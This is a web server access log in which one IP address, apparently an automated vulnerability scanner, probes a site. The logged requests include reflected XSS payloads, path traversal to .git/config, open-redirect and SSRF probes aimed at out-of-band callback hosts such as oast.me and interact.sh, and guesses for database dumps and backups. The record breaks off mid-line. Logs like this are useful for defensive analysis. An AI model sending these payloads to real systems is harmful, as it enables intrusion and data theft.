195.164.49.69 - - [20/Oct/2024:16:22:53 +0000] GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:22:55 +0000] GET /gateway/routes HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:22:57 +0000] GET /actuator/gateway/routes HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:22:59 +0000] GET /transmission/web/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:23:01 +0000] GET /xprober.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:23:03 +0000] GET /containers/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:23:05 +0000] GET /website/lang/en_US?r=https://interact.sh/ HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:23:07 +0000] GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:23:09 +0000] GET /wp-content/backups-dup-lite HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:23:11 +0000] GET /phpmyadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:23:13 +0000] GET /index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1083
- - - [20/Oct/2024:16:23:15 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:23:17 +0000] GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1 404 1101
- - - [20/Oct/2024:16:23:19 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:23:21 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:16:23:24 +0000] GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:16:23:26 +0000] GET /wp-content/plugins/e-search/readme.txt HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:23:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:23:34 +0000] POST /OA_HTML/lcmServiceController.jsp HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:23:36 +0000] POST /NateMail.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:23:38 +0000] POST /api/graphql HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:23:40 +0000] GET /index.php?module=users/login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:23:48 +0000] GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:23:58 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:24:00 +0000] GET /nagiosxi/login.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:24:04 +0000] POST /api/graphql HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:24:06 +0000] POST /wp-admin/admin.php?page=vfb-export HTTP/1.1 404 1096
- - - [20/Oct/2024:16:24:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:24:10 +0000] POST /wp-login.php?wlcms-action=preview HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:24:14 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:24:18 +0000] GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:16:24:20 +0000] POST /login.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:24:26 +0000] POST /search-locker-details.php HTTP/1.1 404 1099
- - - [20/Oct/2024:16:24:32 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:24:34 +0000] POST /webauth_operation.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:24:38 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:24:40 +0000] GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL3t7aW50ZXJhY3RzaC11cmx9fS8/aWQ9QUplJTI1ezEzMzcqMTMzN30jLnh4Ly8= HTTP/1.1 404 1109
- - - [20/Oct/2024:16:24:56 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:24:56 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:01 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:02 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:02 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:03 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:03 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:03 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:03 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:03 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:25:03 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:25:03 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:25:05 +0000] POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:25:15 +0000] POST /save.php HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:25:17 +0000] GET /cgi-bin/info.cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:25:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:25:21 +0000] POST /settings HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:25:23 +0000] GET /api/v1/settings HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:25:25 +0000] GET /file=http://oast.pro/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:25:27 +0000] GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:16:25:31 +0000] POST /queryDevInfo HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:25:31 +0000] GET /index/ajax/lang?lang=../../application/database HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:25:40 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
- - - [20/Oct/2024:16:25:40 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:25:40 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:42 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:45 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:45 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
83.212.98.101 - - [20/Oct/2024:16:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:25:57 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:57 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:57 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:57 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:25:57 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:26:05 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:26:05 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:26:05 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:26:05 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:26:06 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:26:09 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
- - - [20/Oct/2024:16:26:26 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:27 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:27 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:27 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:27 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:27 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:28 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:28 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:28 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:28 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:26:28 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:26:52 +0000] GET /data.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:26:52 +0000] GET /1.sql HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:26:53 +0000] GET /backup.sql HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:26:53 +0000] GET /database.sql HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:27:12 +0000] GET /dump.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:12 +0000] GET /db_backup.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:12 +0000] GET /dbdump.sql HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:27:13 +0000] GET /db.sql HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:27:22 +0000] GET /sdc.iopan.pl:80_db.sql HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:27:22 +0000] GET /sdc.iopan.pl:80.sql HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:27:23 +0000] GET /localhost.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:24 +0000] GET /mysqldump.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:24 +0000] GET /mysql.sql HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:27:24 +0000] GET /site.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:25 +0000] GET /sql.sql HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:27:25 +0000] GET /temp.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:26 +0000] GET /translate.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:26 +0000] GET /users.sql HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:27:26 +0000] GET /wp-content/mysql.sql HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:27:26 +0000] GET /www.sql HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:27:26 +0000] GET /wp-content/uploads/dump.sql HTTP/1.1 404 1109
83.212.98.101 - - [20/Oct/2024:16:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:27:29 +0000] GET /wp-content/mysql.bak HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:27:29 +0000] GET /sa.bak HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:27:29 +0000] GET /wwwroot.bak HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:27:29 +0000] GET /backup.bak HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:27:29 +0000] GET /database.bak HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:27:30 +0000] GET /data.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:30 +0000] GET /db_backup.bak HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:31 +0000] GET /dbdump.bak HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:27:32 +0000] GET /db.bak HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:27:32 +0000] GET /dump.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:32 +0000] GET /sdc.iopan.pl:80.bak HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:27:32 +0000] GET /sdc.iopan.pl:80_db.bak HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:27:33 +0000] GET /localhost.bak HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:33 +0000] GET /mysqldump.bak HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:33 +0000] GET /mysql.bak HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:27:33 +0000] GET /site.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:34 +0000] GET /sql.bak HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:27:34 +0000] GET /temp.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:27:34 +0000] GET /translate.bak HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:27:34 +0000] GET /users.bak HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:27:41 +0000] GET /www.bak HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:27:42 +0000] GET /wp-content/uploads/dump.bak HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:28:13 +0000] GET /lib../.git/config HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:28:14 +0000] GET /static../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:28:14 +0000] GET /js../.git/config HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:28:14 +0000] GET /images../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:28:15 +0000] GET /img../.git/config HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:28:15 +0000] GET /css../.git/config HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:28:15 +0000] GET /assets../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:28:15 +0000] GET /content../.git/config HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:28:15 +0000] GET /events../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:28:15 +0000] GET /media../.git/config HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:28:51 +0000] GET /.github/workflows/main.yaml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:28:51 +0000] GET /.github/workflows/ci.yml HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/ci.yaml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/CI.yml HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/main.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/test.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/build.yml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/build.yaml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/tests.yml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:28:52 +0000] GET /.github/workflows/test.yaml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/tests.yaml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/release.yml HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/deploy.yml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/publish.yml HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/push.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/ci-issues.yml HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/lint.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:28:53 +0000] GET /.github/workflows/coverage.yml HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/release.yaml HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/pr.yml HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/automerge.yml HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/docker.yml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/ci-generated.yml HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/ci-push.yml HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:28:54 +0000] GET /.github/workflows/ci-daily.yml HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:29:21 +0000] GET /.github/workflows/smoosh-status.yml HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:29:21 +0000] GET /.github/workflows/snyk.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:29:24 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:29:29 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:29:30 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:29:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:29:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:12 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:12 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:12 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:12 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:13 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-i